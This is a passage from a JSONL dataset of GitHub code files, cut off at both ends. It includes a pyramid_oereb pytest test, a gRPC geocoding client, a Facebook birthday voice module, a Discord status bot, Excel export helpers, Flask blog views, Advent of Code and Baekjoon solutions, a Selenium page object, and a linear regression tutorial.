all(self):\n return [\n document(**{\n 'id': 1,\n 'document_type': 'Hinweis',\n 'index': 1,\n 'law_status': 'inKraft',\n 'title': {'de': 'Titel1'},\n 'office_id': 1,\n 'published_from': date_today - datetime.timedelta(days=5),\n 'published_until': date_today + datetime.timedelta(days=5),\n 'text_at_web': {'de': 'https://test1.abcd'},\n 'abbreviation': {'de': 'abkrz'},\n 'official_number': {'de': 'ch.abc.d123'},\n 'file': png_binary\n }),\n document(**{\n 'id': 2,\n 'document_type': 'Gesetz',\n 'index': 2,\n 'law_status': 'inKraft',\n 'title': {'de': 'Titel2'},\n 'office_id': 1,\n 'published_from': date_today - datetime.timedelta(days=5),\n 'published_until': date_today + datetime.timedelta(days=5),\n 'text_at_web': {'de': 'https://test2.abcd'},\n 'abbreviation': {'de': 'abkrz'},\n 'official_number': {'de': 'ch.abc.d321'},\n 'file': png_binary\n })\n ]\n\n class Session(session):\n\n def query(self, term):\n return Query()\n\n yield Session\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_get_main_document_type_by_data_code(app_config):\n def mock_get_main_document_type_by_data_code(doc_type):\n if doc_type == 'Hinweis':\n return DocumentTypeRecord('Hinweis', {'de': 'Hinweis'})\n if doc_type == 'Gesetz':\n return DocumentTypeRecord('Gesetz', {'de': 'Gesetz'})\n\n with patch(\n 'pyramid_oereb.core.config.Config.get_main_document_type_by_data_code',\n mock_get_main_document_type_by_data_code):\n yield\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_get_main_law_status_by_data_code(app_config):\n def mock_get_main_law_status_by_data_code(law_status):\n return LawStatusRecord('inKraft', {'de': 'In Kraft'})\n\n with patch(\n 'pyramid_oereb.core.config.Config.get_main_law_status_by_data_code',\n mock_get_main_law_status_by_data_code):\n yield\n\n\ndef test_read_all(document_source_params, all_document_result_session, office_records, png_binary, date_today): # noqa: E501\n source = DatabaseSource(**document_source_params)\n with patch('pyramid_oereb.core.adapter.DatabaseAdapter.get_session', return_value=all_document_result_session()): # noqa: E501\n source.read(office_records)\n assert len(source.records) == 2\n assert isinstance(source.records[0], DocumentRecord)\n assert isinstance(source.records[1], DocumentRecord)\n test_document = source.records[0]\n assert test_document.identifier == 1\n assert isinstance(test_document.document_type, DocumentTypeRecord)\n assert test_document.index == 1\n assert isinstance(test_document.law_status, LawStatusRecord)\n assert test_document.title == {'de': 'Titel1'}\n assert isinstance(test_document.responsible_office, OfficeRecord)\n assert test_document.published_from == date_today - datetime.timedelta(days=5)\n assert test_document.published_until == date_today + datetime.timedelta(days=5)\n assert test_document.published\n assert test_document.text_at_web == {'de': 'https://test1.abcd'}\n assert test_document.abbreviation == {'de': 'abkrz'}\n assert test_document.official_number == {'de': 'ch.abc.d123'}\n assert test_document.file == png_binary\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/contrib.data_sources.standard/sources/test_document.py","file_name":"test_document.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"23081304176","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport grpc\nimport data_pb2, data_pb2_grpc\nimport memory_profiler\nimport psutil\n_HOST = '10.10.94.53'\n_PORT = '8765'\n\n@memory_profiler.profile\ndef run(country,city,map_info=None,province=None):\n if not province:\n #print ('asd')\n if map_info:\n text = country + '&' + city + '&' + map_info\n else:\n text = country + '&' + city\n else:\n if map_info:\n text = country + '&' + city + '&' + map_info + '~' + province\n #print (text)\n else:\n text = country + '&' + city + '~' + province\n #print('a',text)\n conn = grpc.insecure_channel(_HOST + ':' + _PORT)\n client = data_pb2_grpc.FormatDataStub(channel=conn)\n response = client.DoFormat(data_pb2.Data(text=text))\n print(\"received: \" + response.text)\n return response.text\n\n\nif __name__ == '__main__':\n for i in range(10):\n run('Jordan', 'Wadi Musa','35.4832992553711,30.3166999816895')\n run('意大利', '塔兰托(省)')\n run('约旦', '安曼 (及邻近地区)')\n run('日本', '大阪县') # \"2.35147638246417,48.8566821749061\")[0].cid)\n run('中国', '达县县')\n for map in [\"115.041500091553,-8.45612507720947\", \"115.210892,-8.273642\", \"115.222,-8.656\", \"115.22156,-8.65667\",\"115.111241,-8.380058\", \"115.188916,-8.409518\"]:\n run('印度尼西亚', '巴厘岛',map)\n run('中国', '马祖')\n run('美国', 'Wilmington','-77.9447102,34.2257255',province='p501027')\n run('美国', 'Wilmington', '-77.9447102,34.2257255', province='p501029')\n run('Jordan', 'Wadi Musa')\n run('日本','别府',province='p121008')","repo_name":"20113261/platform_service","sub_path":"Common/CityMapClient.py","file_name":"CityMapClient.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19476341067","text":"# -*- coding: utf-8-*-\nimport datetime\nimport re\nimport facebook\nfrom client.app_utils import getTimezone\n\nWORDS = [\"ANNIVERSAIRE\"]\n\n\ndef handle(text, mic, profile):\n \"\"\"\n Responds to user-input, typically speech text, by listing the user's\n Facebook friends with birthdays today.\n\n Arguments:\n text -- user-input, typically transcribed speech\n mic -- used to interact with the user (for both input and output)\n profile -- contains information related to the user (e.g., phone\n number)\n \"\"\"\n oauth_access_token = profile['keys'][\"FB_TOKEN\"]\n\n graph = facebook.GraphAPI(oauth_access_token)\n\n try:\n results = graph.request(\"me/friends\",\n args={'fields': 'id,name,birthday'})\n except facebook.GraphAPIError:\n mic.say(\"Je n'es pas été autorisée à avoir accès à votre compte Facebook.\" +\n \"Si vous voulez me donner l'accès, merci de consulter la documentation sur GitHub.\")\n return\n except:\n mic.say(\n \"Veuillez m'excuser, il y a actuellement un problème avec ce service.\")\n return\n\n needle = datetime.datetime.now(tz=getTimezone(profile)).strftime(\"%m/%d\")\n\n people = []\n for person in results['data']:\n try:\n if needle in person['birthday']:\n people.append(person['name'])\n except:\n continue\n\n if len(people) > 0:\n if len(people) == 1:\n output = people[0] + \" a un anniversaire aujourd'hui.\"\n else:\n output = \"Vos amis fêtant leur anniversaire aujourd'hui sont \" + \\\n \", \".join(people[:-1]) + \" et \" + people[-1] + \".\"\n else:\n output = \"Aucun de vos amis fêtes son anniversaire aujourd'hui.\"\n\n mic.say(output)\n\n\ndef isValid(text):\n \"\"\"\n Returns True if the input is related to birthdays.\n\n Arguments:\n text -- user-input, typically transcribed speech\n \"\"\"\n return bool(re.search(r'anniversaire', text, re.IGNORECASE))\n","repo_name":"mwellck/shella-client","sub_path":"client/modules/fr/FBirthday.py","file_name":"FBirthday.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10752307983","text":"import discord\nfrom discord.ext import commands\nimport traceback\n\nimport datetime\nimport pytz\n\nimport asyncio\nimport psutil\n\nimport configparser\nconfig = configparser.ConfigParser()\n\n# 環境変数は .env から読み込む\nfrom dotenv import load_dotenv\nload_dotenv()\n\nINITIAL_COGS = [\n 'cogs.mainCog',\n 'cogs.chatGPTCog'\n]\n\n# 設定読み込み\nconfig.read('config/config.ini')\nOWNER_ID = int(config['DISCORD']['owner_id']) # DM 送信先のID\n\n\n# 起動時DMのID格納用\nDM_ID = None\n\n# JST に変換\ndef jst(utc_time):\n # タイムゾーンを JST に指定\n jst_timezone = pytz.timezone('Asia/Tokyo')\n \n # JST に変換\n utc = pytz.timezone('UTC')\n utc_time = utc.localize(utc_time) # UTC付与\n jst_time = utc_time.astimezone(jst_timezone)\n \n return jst_time\n\n# BOT の起動時刻を取得\nstart_time = jst(datetime.datetime.utcnow())\n\n# BOT のかどう時間を取得\nasync def get_uptime():\n # 現在の時刻を取得\n current_time = jst(datetime.datetime.utcnow())\n # 稼働時間を計算\n uptime = current_time - start_time\n # 稼働時間を整形\n uptime_hours = uptime.total_seconds() / 3600\n\n return uptime_hours\n\n# DM 用メッセージを生成\nasync def generate_dm_message():\n # BOTの起動時間、累計稼働時間、最後のハートビート時刻を取得\n uptime_hours = await get_uptime()\n heartbeat_time = jst(datetime.datetime.utcnow()).strftime('%Y/%m/%d %H:%M:%S')\n\n # ついでに招待リンクも生成\n invite_link = discord.utils.oauth_url(\n bot.user.id,\n permissions=discord.Permissions(administrator=True),\n scopes=(\"bot\", \"applications.commands\")\n )\n\n # メッセージのテンプレート\n message_template = f\"-----------------------------------------------\\n\" \\\n f\"**Wakeup Datetime:** {start_time.strftime('%Y/%m/%d %H:%M:%S')}\\n\" \\\n f\"**Last Heartbeat:** {heartbeat_time}\\n\" \\\n f\"**Uptime:** {uptime_hours:.2f}h\\n\" \\\n f\"-----------------------------------------------\\n\" \\\n f\"[**Bot Invite Link**]({invite_link})\\n\" \\\n f\"-----------------------------------------------\"\n return message_template\n\n# DM 送信\nasync def send_dm(bot):\n global MESSAGE_ID # グローバル変数の使用を宣言\n owner = await bot.fetch_user(OWNER_ID)\n message = await owner.send(await generate_dm_message())\n MESSAGE_ID = message.id # 送信したメッセージのIDを格納\n\n# DM 編集\nasync def edit_dm(bot):\n global MESSAGE_ID # グローバル変数の使用���宣言\n owner = await bot.fetch_user(OWNER_ID)\n while True:\n try:\n dm = await owner.create_dm()\n message = await dm.fetch_message(MESSAGE_ID)\n await message.edit(content=await generate_dm_message())\n\n # ついでに presence も更新\n await set_presence_uptime()\n \n except Exception as e:\n print(f\"Error editing DM message: {e}\")\n\n await asyncio.sleep(900) # 15分ごとに編集を試行\n\n# メモリ使用率取得\ndef get_status_memusage() -> str:\n mem_usage = psutil.virtual_memory().percent\n return f\"MEM USAGE: {mem_usage}% \"\n# サーバー PING 計測\ndef get_status_ping() -> str:\n ping = round(bot.latency * 1000) # Botのサーバーとのpingをミリ秒単位で取得し、小数点以下を四捨五入\n return f\"PING: {ping}ms \"\n# BOT 稼働時間取得\nasync def get_status_uptime() -> str:\n uptime = await get_uptime()\n return f\"UPTIME: {uptime:.2f}h \"\n\n# bot presence を UPTIME に設定する\nasync def set_presence_uptime():\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=await get_status_uptime()))\n\n# presense 更新\nasync def status_task():\n while True:\n # 各種ステータスを取得する\n activity_list = [\n get_status_memusage(),\n get_status_ping(),\n await get_status_uptime(),\n ]\n\n for get_status in activity_list:\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=get_status))\n await asyncio.sleep(20)\n\n# メインクラス\nclass MyBot(commands.Bot):\n # コンストラクタ\n def __init__(self, command_prefix):\n # インテントの生成\n intents = discord.Intents.all()\n intents.message_content = True\n\n # スーパークラスのコンストラクタに値を渡して実行\n super().__init__(command_prefix, intents=intents, help_command=None)\n\n # 終了処理\n async def shutdown(bot):\n await bot.close()\n\n # すべての cog をリロードする\n async def reload_extensions(self):\n # Cog を読み込み\n for cog in INITIAL_COGS:\n try:\n await bot.reload_extension(cog)\n except Exception:\n traceback.print_exc()\n await bot.tree.sync()\n\n # Bot の準備完了時\n async def on_ready(self):\n for cog in INITIAL_COGS:\n try:\n await bot.load_extension(cog)\n except Exception:\n traceback.print_exc()\n\n await bot.tree.sync()\n await bot.change_presence(activity=discord.Game(name=\"initialized.\"))\n\n print('-----')\n print(self.user.name)\n print(self.user.id)\n print('-----')\n\n # オーナーに DM を送信\n await send_dm(bot)\n bot.loop.create_task(edit_dm(bot))\n\n# 実行\nif __name__ == '__main__':\n bot = MyBot(command_prefix=config['DISCORD']['prefix'])\n bot.run(config['DISCORD']['token'])","repo_name":"twelvehouse/discord-NAVI","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39606816257","text":"import pandas as pd\nimport openpyxl\nimport numpy as np\nfrom openpyxl.utils.cell import get_column_letter\nfrom openpyxl.styles import PatternFill, Font\n\ndef get_available_metrics(dataframes):\n metrics = set()\n for df in dataframes:\n # This print statement is for debugging purposes\n print(f\"Currently processing: {df}, Type: {type(df)}\")\n # Ensure that df is a pandas DataFrame or Series\n if isinstance(df, (pd.DataFrame, pd.Series)):\n metrics.update(df.index.tolist())\n else:\n print(f\"Error: Object {df} is not a pandas DataFrame or Series.\")\n return list(metrics)\n\ndef create_metrics_mapping(dataframes):\n metrics_mapping = {}\n for df_name, df in dataframes.items():\n for metric in df.index:\n metrics_mapping[metric] = df_name\n return metrics_mapping\n\ndef fetch_selected_metrics(ticker, selected_metrics, dataframes, metrics_mapping, years):\n # Initialize DataFrame with ticker as index and metrics as columns\n data = pd.DataFrame(index=[ticker], columns=[f\"{metric}_{'TTM' if year == 0 else 2023 - year}\" for year in range(years) for metric in selected_metrics])\n for metric in selected_metrics:\n if metric in metrics_mapping:\n df_name = metrics_mapping[metric]\n df = dataframes[df_name]\n if metric in df.index:\n print(df.loc[metric])\n values = df.loc[metric].values\n values = np.concatenate([values[:1], values[2:]]) # Exclude the 2023 data\n for year in range(years):\n try:\n value = values[year] # Get the value for the specified year\n except IndexError:\n value = pd.NA # Fill with NA if the data for the year is not available\n\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n column_name = f\"{metric}_{2023-year}\"\n \n # Check if the value is a number and greater than 1000\n if isinstance(value, (int, float)) and abs(value) > 100000:\n value /= 1e6 # Convert to millions\n elif isinstance(value, str): # Check if the value is a string\n try:\n value = float(value) # Try converting the string to a float\n if abs(value) > 100000:\n value /= 1e6 # Convert to millions\n except ValueError:\n pass # Ignore if the string cannot be converted to a float\n\n data.loc[ticker, column_name] = value # Store the value in the DataFrame\n else:\n for year in range(years):\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n column_name = f\"{metric}_{2023-year}\"\n\n data.loc[ticker, column_name] = pd.NA # Fill with NA if the metric is not in the DataFrame\n else:\n for year in range(years):\n # Define column name based on the year\n if year == 0:\n column_name = f\"{metric}_TTM\"\n else:\n column_name = f\"{metric}_{2023-year}\"\n\n data.loc[ticker, column_name] = pd.NA # Fill with NA if the metric is not in the metrics_mapping\n return data.reset_index().rename(columns={'index': 'ticker'})\n\ndef set_cell_format(worksheet, data, column):\n col_letter = openpyxl.utils.cell.get_column_letter(data.columns.get_loc(column) + 1)\n if pd.api.types.is_numeric_dtype(data[column]) and (data[column] <= 1).all():\n for row_num in range(2, len(data) + 2):\n cell = worksheet.cell(row=row_num, column=data.columns.get_loc(column) + 1)\n cell.number_format = '0.00%'\n return worksheet\n\ndef autosize_column(worksheet, data, column):\n col_letter = openpyxl.utils.cell.get_column_letter(data.columns.get_loc(column) + 1)\n max_length = max(len(item) for item in data[column].astype(str))\n worksheet.column_dimensions[col_letter].width = max_length + 2\n return worksheet\n\ndef format_header_row(worksheet):\n for cell in worksheet[\"1:1\"]:\n cell.fill = openpyxl.styles.PatternFill(start_color=\"1F497D\", end_color=\"1F497D\", fill_type=\"solid\")\n cell.font = openpyxl.styles.Font(bold=True, color=\"FFFFFF\")\n if cell.value:\n cell.value = cell.value.title()\n return worksheet\n\ndef generate_excel(data, file_name='comparative_analysis.xlsx'):\n with pd.ExcelWriter(file_name, engine='openpyxl') as writer:\n data.to_excel(writer)\n worksheet = writer.sheets['Sheet1']\n for column in data.columns:\n if not pd.api.types.is_datetime64_any_dtype(data[column]):\n worksheet = set_cell_format(worksheet, data, column)\n worksheet = autosize_column(worksheet, data, column)\n worksheet = format_header_row(worksheet)\n writer.save()\n print(f'Data exported to {file_name}')\n","repo_name":"arnavj99/Bynd","sub_path":"data_processing_and_export.py","file_name":"data_processing_and_export.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44191480095","text":"from flask import Blueprint\nfrom flask import render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\nfrom website import db\nfrom .models import Post\n\nviews = Blueprint('views', __name__)\n\n@views.route('/')\n@views.route('/home')\ndef home():\n post = Post.query.all()\n return render_template('home.html', user=current_user, posts=post)\n # return render_template(\"home.html\" , user=current_user)\n\n@views.route('/create-post', methods=['GET', 'POST'])\n@login_required\ndef create_post():\n if request.method == 'POST':\n text = request.form.get('text')\n\n if len(text) < 1:\n flash('Post is too short!', category='error')\n else:\n post = Post(text=text, author=current_user.id)\n db.session.add(post)\n db.session.commit()\n flash('Post created!', category='success')\n return redirect(url_for('views.home'))\n return render_template(\"create_post.html\", user=current_user)","repo_name":"prince-johnson/Blog-Website","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23874109053","text":"def load_grid(grid):\n #f = open(\"/Users/Breee02/Documents/GitHub/aoc2021/day-9/9-1.txt\", \"r\")\n #f = open(\"/Users/Breee02/Documents/GitHub/aoc2021/day-9/test.txt\", \"r\")\n f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/puzzleinput.txt\", \"r\")\n #f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/test.txt\", \"r\")\n #f = open(\"d:/Users/Robert/Documents/GitHub/Rvdb/AoC2021/aoc2021/day-11/test2.txt\", \"r\")\n for line in f:\n grid.append(list(map(int,list(line.strip()))))\n\ndef print_grid(grid):\n for line in grid:\n print(''.join(map(str, line)))\n\ndef get_neighbour_cells(grid, org_x, org_y):\n neighbour_cells = []\n for y_delta in (-1,0,1):\n y = org_y + y_delta\n if 0 <= y and y < len(grid):\n for x_delta in (-1,0,1):\n x = org_x + x_delta\n if 0 <= x and x < len(grid[y]):\n #if not itself, then append to neighbour cells\n if (x, y) != (org_x, org_y):\n neighbour_cells.append((x, y))\n return neighbour_cells\n\ndef get_next_grid(grid,flash_count):\n from queue import Queue\n flashed = Queue()\n #every cell by +1\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n grid[y][x] += 1\n if grid[y][x] > 9:\n flashed.put((x, y))\n \n #when anyone flashed, then find neighbours and add 1 \n while flashed.qsize() > 0:\n x, y = flashed.get()\n if grid[y][x] >9:\n flash_count += 1\n grid[y][x] = 0 #reset cell to 0\n \n for x_buren, y_buren in get_neighbour_cells(grid, x, y):\n if grid[ y_buren][x_buren] != 0:\n grid[ y_buren][x_buren] += 1\n if grid[ y_buren][x_buren] > 9:\n flashed.put((x_buren, y_buren))\n \n return (grid, flash_count)\n \n\n\ndef puzzel1(input):\n flash_count = 0\n for i in range(0, 100):\n input,flash_count = get_next_grid(input, flash_count)\n print(\"Itteration: %d - #flashes: %d\"% (i+1, flash_count))\n #print_grid(input)\n return flash_count\n\ndef puzzel2(input):\n for i in range(0, 800):\n flash_count=0\n input,flash_count = get_next_grid(input, flash_count)\n \n print(\"Itteration: \", i+1)\n #print_grid(input)\n \n if sum(sum(flashes) for flashes in input) == 0:\n print(f\"Synchronized: {i+1}\")\n break\n return i + 1\n\ninput=[]\nload_grid(input) \nprint_grid(input)\nprint(\"Anwser puzzel 1:\", puzzel1(input))\ninput=[]\nload_grid(input) \nprint_grid(input)\nprint(\"Anwser puzzel 2:\", puzzel2(input))","repo_name":"rvdbreemen/aoc2021","sub_path":"day-11/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70849401448","text":"import time\n\nfrom selenium.webdriver.common.by import By\n\nfrom web.test_selenium_work2.page.base_page import BasePage\n\n\nclass Contact(BasePage):\n _memberTable_td = \".member_colRight_memberTable_td\"#通讯录用户信息行\n _number = '//*[@id=\"js_contacts263\"]/div/div[2]/div/div[2]/div[1]/div[2]/span/span/span[2]'#人数\n _tb_member = \".member_colRight_memberTable_td_Checkbox\"#定位到列表行\n _checkbox = \".ww_checkbox\"#选择用户按钮\n _delete = \".js_delete\"#删除按钮\n _submit = \".qui_btn ww_btn ww_btn_Blue\"#确定按钮\n _cancel = \"确认\"#弹窗点击按钮元素\n\n def get_addmember(self):\n elements = self.finds(By.CSS_SELECTOR,self._memberTable_td)\n name_list =[element.get_attribute(\"title\") for element in elements]\n return name_list\n\n def get_number(self):\n number = self.find(By.XPATH,self._number).text\n return number\n\n def delete_member(self):\n #定位到checkbox元素位置\n self.finds(By.CSS_SELECTOR,self._tb_member)\n time.sleep(3)\n #定位到checkbox元素选项并点击\n self.find(By.CSS_SELECTOR,self._checkbox).click()\n time.sleep(3)\n #点击删除按钮\n self.find(By.CSS_SELECTOR,self._delete).click()\n #点击弹窗确认删除\n self.find(By.LINK_TEXT,self._cancel).click()\n time.sleep(3)\n #重新查表用于断言校验\n elements = self.finds(By.CSS_SELECTOR, self._memberTable_td)\n name_list = [element.get_attribute(\"title\") for element in elements]\n return name_list","repo_name":"jimmylinz/LagouProject","sub_path":"web/test_selenium_work2/page/contact_page.py","file_name":"contact_page.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098251367","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Function ----------\ndef similar(lst, lst_size):\n cnt = 0\n\n for start in range(lst_size - 1):\n for end in range(start + 1, lst_size):\n startUpper = sum(c.isupper() for c in lst[start])\n endUpper = sum(c.isupper() for c in lst[end])\n\n startTxt = ''.join(sorted(lst[start].upper()))\n endTxt = ''.join(sorted(lst[end].upper()))\n\n if startUpper == endUpper and startTxt == endTxt:\n cnt += 1\n\n return cnt\n\n# ---------- Main ----------\nT = int(input())\n\nfor _ in range(T):\n N, K = map(int, input().split())\n words = list(map(str, input().split()))\n\n print(similar(words, N))","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_21980.py","file_name":"acmicpc_21980.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33444157961","text":"# libraries\nimport numpy as np\nimport scipy as sp\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# read data\ndf = pd.read_csv('data05_boston.csv')\n\n# simple linear regression\nfrom sklearn.linear_model import LinearRegression\nX = df[ ['lstat','age','rm'] ]\n#X = df[ ['lstat'] ] # Single row DataFrame\ny = df['medv'] # Series\n\nlm = LinearRegression()\nlm.fit(X,y) # Get beta-0 and beta-1: medv = b0 + b1*lstat\nlm.coef_ # coefficients\nlm.intercept_ # intercepter\n# Training Session is Done\n\nlm.predict(10)\nlm.predict([[5], [10], [15]]) # 3 by 1 2dim arr (matrix), not 1 by 3 [5,10,15]\nyhat = lm.predict(X) # prediction by using training set\nr2 = lm.score(X,y) # R2; Performance Measurement named R-Square\nrmse = np.sqrt(((y-yhat)**2).mean()) # error from training set\n# r2, rmse are TRAINING ERROR, so if you consider more inputs,\n# PERFORMANCE should be better\n\n\nplt.plot(X,y,'bo')\nplt.plot(X,yhat,'r',linewidth=2)\nplt.title('%s vs. Medv: %.2f' % ('lstat',r2))\nplt.show()\n\n# multiple linear regression\nX = df.iloc[:,0:13]\ny = df['medv']\nlm = LinearRegression()\nlm.fit(X,y)\nlm.coef_ # coefficients\nlm.intercept_ # intercepter\nyhat = lm.predict(X) # prediction\nr2 = lm.score(X,y) # R2\nrmse = np.sqrt(((y-yhat)**2).mean())\n\nplt.plot(yhat,y,'bo')\nplt.title('All vs. Medv: %.2f' % r2)\nplt.show()\n\n# Where is P value??????? what the f**k!!!\n# So we are introducing StatsModel\n\n# using StatsModel\nimport statsmodels.api as sm\nX = df.iloc[:,0:13]\n# While scikit-learn takes intercept in the default model,\n# statsmodels doesn't take it by default.\n# If you consider intercept, you should invoke 'add_constant()'\nX = sm.add_constant(X)\ny = df['medv']\n\n# Ordinary Least Squre\n# This is a sort of constructor\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\nr.params\nr.pvalues\n\n# add a new variable\nplt.plot(df['lstat'],df['medv'],'bo')\nX = df[ ['lstat'] ]\nlstat2 = X['lstat']**2\nX['lstat2'] = lstat2\nX = sm.add_constant(X)\ny = df['medv']\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\nX = df[ ['lstat','rm'] ]\nX['lstat_rm'] = X['lstat'] * X['rm']\nX = sm.add_constant(X)\ny = df['medv']\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n# training vs. test set\nnp.random.seed(1)\ntrain_idx = list(np.random.choice(np.arange(df.shape[0]),300,replace=False))\ntest_idx = list(set(np.arange(df.shape[0])).difference(train_idx))\ndftrain = df.iloc[train_idx,:]\ndftest = df.iloc[test_idx,:]\n\n# Removes inputs whose p-values are high\n# This describes HOW SIMPLER MODEL CAN REDUCE OVERFITTING ISSUE.\nxtrain = dftrain.iloc[:,[0,1,3,4,5,7,8,9,10,11,12]]\nytrain = dftrain['medv']\nxtest = dftest.iloc[:,[0,1,3,4,5,7,8,9,10,11,12]]\nytest = dftest['medv']\n\n# Alternatively,\n# Use all samples in both TRAINING and TEST\n# This causes the increase of TEST-SET RMSE\nxtrain = dftrain.iloc[:,:-1]\nytrain = dftrain['medv']\nxtest = dftest.iloc[:,:-1]\nytest = dftest['medv']\n\n\nlm = LinearRegression()\nlm.fit(xtrain,ytrain)\n\nyhat_train = lm.predict(xtrain)\nrmse_train = np.sqrt( ((ytrain-yhat_train)**2).mean() )\nr2_train = lm.score(xtrain,ytrain)\n\nyhat_test = lm.predict(xtest)\nrmse_test = np.sqrt( ((ytest-yhat_test)**2).mean() )\nr2_test = lm.score(xtest,ytest)\n\nprint(rmse_train,rmse_test)\n\n\n###########################################################\n# Practice Reference Code\n###########################################################\n\n# data01_iris.csv를 읽으시오. \n# Sepal Width ~ Sepal.Length + Petal.Length + Petal.Width 로 \n# 선형 회귀 분석을 수행하시오. \n# (1) R2와 RMSE 값은 얼마인가?\n# (2) 어떤 변수의 제곱항을 추가하였을 때, 가장 높은 R2를 갖는 것은 어느 변수인가?\n# (3) Sepal.Length와 Petal.Length의 interaction 항을 추가하였을 때, R2은 \n# 얼마인가?\n# (4) 범주형 변수 Sepcies를 포함��켜 선형 회귀 분석을 수행하시오.\nx = np.zeros(10)\nx[0:5] = 1\n\ndf = pd.read_csv('data01_iris.csv')\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\ny = df ['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X, y)\nr2 = lm.score(X,y) # R2; Performance Measurement named R-Square\n\nyhat = lm.predict(X)\nrmse = np.sqrt(((y-yhat)**2).mean()) # error from training set\n\n\nr2_1storder = r2\n\nspln_2nd = df['Sepal.Length']**2\nptln_2nd = df['Petal.Length']**2\nptwd_2nd = df['Petal.Width']**2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['spln_2nd'] = spln_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_spln2 = r2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['ptln_2nd'] = ptln_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_ptln2 = r2\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['ptwd_2nd'] = ptwd_2nd\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_ptwd2 = r2\n\nprint(r2_1storder, r2_spln2, r2_ptln2, r2_ptwd2)\n\n\n\nsplnptln = X['Sepal.Length'] * X['Petal.Length']\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\nX['splnptln'] = splnptln\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\nr2_inter = r2\n\nprint(r2_1storder, r2_spln2, r2_ptln2, r2_ptwd2, r2_inter)\n\n\nr2_org = r2\n\nseteff_idx = (df['Species'] == 'setosa')\nvrgeff_idx = (df['Species'] == 'virginica')\n\nX = df [['Sepal.Length', 'Petal.Length', 'Petal.Width']]\ny = df ['Sepal.Width']\n\nseteff_idx = seteff_idx.astype(int)\nvrgeff_idx = vrgeff_idx.astype(int)\n\nX['seteff'] = seteff_idx\nX['vrgeff'] = vrgeff_idx\n\nlm = LinearRegression()\nlm.fit(X,y)\nr2 = lm.score(X,y)\n\n\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# PLEASE DO NOT GO DOWN BEFORE YOU TRY BY YOURSELF\n\n###########################################################\n# Practice Reference Code\n###########################################################\n\n# practice\ndf = pd.read_csv('data01_iris.csv')\n\n# OLS\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\n\nlm = LinearRegression()\nlm.fit(X,y)\nlm.score(X,y)\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nf.fit().summary()\n\n\n# adding 2nd order term\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\nx1 = X['Petal.Width']**2\nX['PW2'] = x1\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nf.fit().summary()\n\n\n# adding interaction term\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\ny = df['Sepal.Width']\n\nx1 = X['Petal.Width']*X['Petal.Length']\nX['Inter'] = x1\n\nX = sm.add_constant(X)\nf = sm.OLS(y,X)\nr = f.fit()\nr.summary()\n\n\n# adding Species\nX = df[['Sepal.Length','Petal.Length','Petal.Width']]\n\nx1 = pd.Series(np.zeros(X.shape[0]))\nx1[ df['Species']=='setosa' ] = 1\n\nx2 = pd.Series(np.zeros(X.shape[0]))\nx2[ df['Species']=='virginica' ] = 